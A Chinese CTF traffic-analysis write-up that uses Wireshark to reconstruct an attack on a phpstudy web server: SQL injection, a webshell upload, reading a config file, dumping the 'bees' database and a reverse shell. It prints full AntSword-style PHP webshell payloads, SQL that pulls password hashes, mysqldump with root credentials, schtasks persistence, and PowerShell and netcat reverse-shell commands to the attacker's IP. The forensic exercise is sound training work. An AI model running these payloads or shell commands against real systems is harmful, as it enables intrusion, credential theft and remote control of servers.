陇剑杯 省赛 攻击者1 CTF wireshark 流量分析

陇剑杯 省赛 攻击者1

题目

链接：https://pan.baidu.com/s/1KSSXOVNPC5hu_Mf60uKM2A?pwd=haek 
提取码：haek
├───LogAnalize
│   ├───linux简单日志分析
│   │       linux-log_2.zip
│   │
│   ├───misc日志分析
│   │       access.log
│   │
│   ├───misc简单日志分析
│   │       app.log
│   │
│   ├───sql注入分析
│   │       SQL.zip
│   │
│   └───windows日志分析
│           security-testlog_2.zip
│
├───ProvinceAttacker
│   └───pcap
│           01 Web.pcapng
│           02 DC.pcapng
│           02 Web-ToInternet.pcapng
│           02 Web-ToIntranet.pcapng
│           03 Web.pcapng
│           pcap.zip
│
└───TrafficAnalize
    ├───ios
    │       ios.zip
    │
    └───webshell
            hack.pcap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

本文题目在ProvinceAttacker中，01 Web.pcapng

攻击者 1

1-1

分析主机及流量，提交第一个成功Getshell的攻击者IP地址。

flag
10.11.43.4

看一下post包

看到恶意url请求

 [truncated]POST /admin/login.php?action=ck_login&BGol=8278%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%
1

url解出

 [truncated]POST /admin/login.php?action=ck_login&BGol=8278 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**%
1
2

是个xss攻击

1-2

提交Web应用访问日志的名称及绝对路径，如：C:\log.txt。

本题在没在线虚拟机的情况下没法直接做

路径为C盘，phpstudy（大于2020）新版安装下的apache默认访问日志路径

这题爆0，乐了

1-3

第一个攻击者获取到了后台登录密码，请提交攻击者通过sql注入获取到的后台登录密码。

flag
admin123

使用wireshark过滤语句

http.request.method == "POST" and http contains "login"
1

找到包含登录信息的包

前面的数据包是一些盲注

最后黑客将在login.php中登录，直接看黑客输的密码是即可

1-4

第一个攻击者成功登录后台，请提交攻击者成功登录后台后访问到管理员面板的时间，以系统时间（UTC +8）为准，如：01/Dec/2021:12:00:01。

注意时区，UTC+8时区

flag
23/Dec/2021:19:25:56

菜单设置中改一下时间显示格式

我对这个flag有疑问

54秒发登录包，密码输入正确admin123
55秒回包302
55秒请求admin.php
57秒响应html

这个应当是小误差，就当是56秒吧

网络传输有时间差，具体情况具体分析

1-5

第一个攻击者了利用文件上传漏洞，上传了Webshell，请提交第一个攻击者上传的Webshell的文件的MD5值。

138683	2021-12-23 19:27:44.072126	10.11.43.4	10.20.24.62	HTTP	377	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
1

后续的post操作集中在/upload/img/202112231926441247.php中，推测有马

包138683在wireshark中info显示有(image/png)，推测这应该是黑客上传的webshell

导出分组字节流

在.bin字节流文件中看到了马`

将多余的内容删掉，留下的内容如图（要加个回车，这个文件有两行）

windows中用 certutil -hashfile md5 算出文件的md5值

MD5 hash of ma.bin:
1f5a9c2a32aabe76a8442777657a1cf9
CertUtil: -hashfile command completed successfully.
1
2
3

flag
1f5a9c2a32aabe76a8442777657a1cf9

1-6

第一个攻击者访问了敏感文件，得到MySQL数据库的密码。请提交攻击者访问的敏感文件的文件名，如：1.php

配置文件.ini一般有账号密码等信息。直接搜.ini文件找不到，因为参数中观察到的编码为base64，黑客通过对post参数的url解码，然后执行命令

在数据包

140290	2021-12-23 19:27:58.182000	10.11.43.4	10.20.24.62	HTTP	89	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
1

中 post 体 中的参数是有趣的

HTML Form URL Encoded: application/x-www-form-urlencoded
     [truncated]Form item: "1" = "@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".c8a6ec5f3c";@mkdir($tmdi
    Form item: "x67fff8f606c8b" = "OvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA=="
1
2
3

黑客写入的代码是

@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".c8a6ec5f3c";@
    mkdir($tmdir);@
    chdir($tmdir);@
    ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {@
        chdir("..");
    }@
    ini_set("open_basedir", "/");@
    rmdir($ocwd.
        "/".$tmdir);
};

function asenc($out) {
    return $out;
};

function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "d39c0".
    "afca3";
    echo@ asenc($output);
    echo "d27c".
    "6600";
}
ob_start();
try {
    $F = base64_decode(substr($_POST["x67fff8f606c8b"], 2));
    $P = @fopen($F, "r");
    echo(@fread($P, filesize($F) ? filesize($F) : 4096));@
    fclose($P);;
} catch (Exception $e) {
    echo "ERROR://".$e - > getMessage();
};
asoutput();
die();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

不难看出$F = base64_decode(substr($_POST["x67fff8f606c8b"], 2))，对键x67fff8f606c8b的值去掉前两位后进行base64解码

解出

C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.php
1

config.php为配置文件，mysql密码应当就写在其中吧

flag
confing.php

1-7

第一个攻击者在获取到数据库口令后，对数据库进行了拖库。请提交攻击者拖库数据库的名称。

观察数据包

146520	2021-12-23 19:28:52.059518	10.11.43.4	10.20.24.62	HTTP	766	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
1

黑客写了一段代码

@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".278c68b";@
    mkdir($tmdir);@
    chdir($tmdir);@
    ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {@
        chdir("..");
    }@
    ini_set("open_basedir", "/");@
    rmdir($ocwd.
        "/".$tmdir);
};

function asenc($out) {
    return $out;
};

function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "2fb96".
    "62ed12";
    echo@ asenc($output);
    echo "edc2c".
    "13c82";
}
ob_start();
try {
    $f = base64_decode(substr($_POST["oe6306e1fc193"], 2));
    $c = $_POST["b91f2c6a32d6e7"];
    $c = str_replace("\r", "", $c);
    $c = str_replace("\n", "", $c);
    $buf = "";
    for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));
    echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {
    echo "ERROR://".$e - > getMessage();
};
asoutput();
die();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

对post体中的键oe6306e1fc193截断前两位，做base64解码

Value: dvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==
1

解出

C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql
1

推测黑客进行了数据库操作

另一个键b91f2c6a32d6e7的值看起来不像base64，而在代码中它是直接运算的，考虑它的加密方式是hex(十六进制)

Value [truncated]: 75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D69

1
2

完整值

75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B
1

hex解码

use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;
1
2
3

mysql在命令行中操作use <数据库>

黑客对bees数据库拖库

flag
bees

1-8

第一个攻击者上传了文件用于创建反弹shell，请还原该文件并提交该文件的MD5值。

这题没解出来，跳过

1-9

第一个攻击者利用工具反弹shell，请提交回连的端口。

在包中

227682	2021-12-23 19:41:41.849164	10.11.43.4	10.20.24.62	HTTP	636	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
1

黑客写入代码

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
	$oparr=preg_split("/\\\\|\//",$opdir);
	$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
	$tmdir=".429d4";
	@mkdir($tmdir);
	@chdir($tmdir);
	@ini_set("open_basedir","..");
	for ($i=0;$i<sizeof($oparr);$i++) {
		@chdir("..");
	}
	@ini_set("open_basedir","/");
	@rmdir($ocwd."/".$tmdir);
}
;
function asenc($out) {
	return $out;
}
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "7a5d"."bc377";
	echo @asenc($output);
	echo "cff"."cb78";
}
ob_start();
try {
	$p=base64_decode(substr($_POST["q52db3dce849a"],2));
	$s=base64_decode(substr($_POST["za724065ab2aa8"],2));
	$envstr=@base64_decode(substr($_POST["v4ddc5d989f9d5"],2));
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
	if(substr($d,0,1)=="/") {
		@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	} else {
		@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
	}
	if(!empty($envstr)) {
		$envarr=explode("|||asline|||", $envstr);
		foreach($envarr as $v) {
			if (!empty($v)) {
				@putenv(str_replace("|||askey|||", "=", $v));
			}
		}
	}
	$r="{$p} {$c}";
	function fe($f) {
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
			$d=array();
		} else {
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runshellshock($d, $c) {
		if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
			if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
				$tmp = tempnam(sys_get_temp_dir(), 'as');
				putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
				if (fe('error_log')) {
					error_log("a", 1);
				} else {
					mail("a@127.0.0.1", "", "", "-bv");
				}
			} else {
				return False;
			}
			$output = @file_get_contents($tmp);
			@unlink($tmp);
			if ($output != "") {
				print($output);
				return True;
			}
		}
		return False;
	}
	;
	function runcmd($c) {
		$ret=0;
		$d=dirname($_SERVER["SCRIPT_FILENAME"]);
		if(fe('system')) {
			@system($c,$ret);
		} elseif(fe('passthru')) {
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
			print(@shell_exec($c));
		} elseif(fe('exec')) {
			@exec($c,$o,$ret);
			print(join("
",$o));
		} elseif(fe('popen')) {
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
				print(@fgets($fp,2048));
			}
			@pclose($fp);
		} elseif(fe('proc_open')) {
			$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
			while(!@feof($io[1])) {
				print(@fgets($io[1],2048));
			}
			while(!@feof($io[2])) {
				print(@fgets($io[2],2048));
			}
			@fclose($io[1]);
			@fclose($io[2]);
			@proc_close($p);
		} elseif(fe('antsystem')) {
			@antsystem($c);
		} elseif(runshellshock($d, $c)) {
			return $ret;
		} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
			$w=new COM('WScript.shell');
			$e=$w->exec($c);
			$so=$e->StdOut();
			$ret.=$so->ReadAll();
			$se=$e->StdErr();
			$ret.=$se->ReadAll();
			print($ret);
		} else {
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={$ret}":"";
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141

CfY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=
1

解出

cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8
1

端口为5678，这是nc64.exe的使用

flag
5678

1-10

第一个攻击者为了持续获得敏感数据，在系统中留下了持久化项，请提交该项的具体名称，如：persistence。

这题没解出来

未解决的疑问

在第五题

第一个攻击者了利用文件上传漏洞，上传了Webshell，请提交第一个攻击者上传的Webshell的文件的MD5值。

getshell用的是一句话木马，为啥要在马后面加个回车？

考虑出题者出题时的写文件习惯

文件内容不同，算出的md5也就不同

随手的记录

边看边解

黑客执行命令的记录

这部分不重要，不用看

139039
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkL2ltZy8=
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img/

139279
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkLw==
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/

139435
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cv
C:/Program Files/phpstudy/PHPTutorial/WWW/

139827
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS8=
C:/Program Files/phpstudy/PHPTutorial/WWW/data/

140290
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA==
C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.php

this is a flag



change key


140974
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC8=
C:/Program Files/phpstudy/PHPTutorial/

141174
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC8=
C:/Program Files/phpstudy/PHPTutorial/MySQL/

141491
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/

141655
Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 0273924&cd&echo bc6d88e68

cmd

143282
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsZHVtcC5leGUgLXVyb290IC1wcm9vdCBiZWVzID4gYmFjay5zcWwmZWNobyAwMjczOTI0JmNkJmVjaG8gYmM2ZDg4ZTY4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysqldump.exe -uroot -proot bees > back.sql&echo 0273924&cd&echo bc6d88e68

143754
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68

144181


145025
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vYmFjay5zcWw=
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/back.sql

146520
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql

75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B
use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;

this is a flag




try to get faster

Value: AkQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/

Value: JAY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68

Value: aIY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsLmV4ZSAtdXJvb3QgLXByb290IDwgdXBkYXRlLnNxbCZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysql.exe -uroot -proot < update.sql&echo 0273924&cd&echo bc6d88e68

Value [truncated]: fuY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9jcmVhdGUgL3RuIFVwZGF0ZVNRTCAvdHIgIiJDOi9Qcm9ncmFtIEZpbGVzL3BocHN0dWR5L1BIUFR1dG9yaWFsL015U1FML2Jpbi9teXNxbC5leGUiIC11cm9vdC

Value: pwY2QgL2QgInJldD0xIiY7JmVjaG8gMDI3MzkyNCZjZCZlY2hvIGJjNmQ4OGU2OA==
cd /d "ret=1"&;&echo 0273924&cd&echo bc6d88e68

Value: d7Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 5725ff6e9&cd&echo 99a07eb8


Value: OWY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8

Value: A1Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmNoY3AgNjUwMDEmZWNobyA1NzI1ZmY2ZTkmY2QmZWNobyA5OWEwN2ViOA==
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&chcp 65001&echo 5725ff6e9&cd&echo 99a07eb8

Value: K9Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8


178849	2021-12-23 19:33:47.048736	10.11.43.4	10.20.24.62	HTTP	1302	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
Value [truncated]: MMY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnBvd2Vyc2hlbGwgLW5vcCAtYyAiJGNsaWVudCA9IE5ldy1PYmplY3QgTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMS40My40Jyw1Njc4KTskc3RyZWFtID0gJGNsaWVudC5HZX
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('10.11.43.4',5678);$s


Value: P0QzovUHJvZ3JhbSBGaWxlcy8=
C:/Program Files/

216872


216872
Value: 5CQzovUHJvZ3JhbSBGaWxlcy9uYzY0LmV4ZQ==
C:/Program Files/nc64.exe



227682
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=

cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8

this is a flag


admin_pic_upload.php%3ftype=radio&get=thumb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131